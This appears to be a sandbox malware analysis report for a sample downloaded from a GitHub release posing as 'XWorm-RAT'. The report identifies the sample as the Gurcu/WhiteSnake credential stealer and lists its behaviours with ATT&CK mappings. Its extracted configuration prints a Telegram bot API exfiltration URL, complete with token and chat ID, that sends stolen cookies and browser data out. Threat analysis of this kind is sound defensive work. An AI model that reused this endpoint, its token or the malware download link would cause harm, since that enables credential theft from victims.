Resubmissions
09-01-2025 19:49
250109-yjtbhs1nck 1009-01-2025 19:48
250109-yjlaxa1nbq 309-01-2025 18:48
250109-xf75tszlcj 1009-01-2025 18:45
250109-xeef5azkfp 1009-01-2025 18:34
250109-w7sc1szjak 1009-01-2025 18:31
250109-w54y2axkf1 1003-01-2025 17:08
250103-vntw3atqdt 1003-01-2025 15:27
250103-svv2latmgr 1003-01-2025 15:23
250103-sslp5stlhk 10General
-
Target
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
-
Sample
250109-w54y2axkf1
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb
Targets
-
-
Target
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Score10/10-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Reads user/profile data of web browsers
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates processes with tasklist
-
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1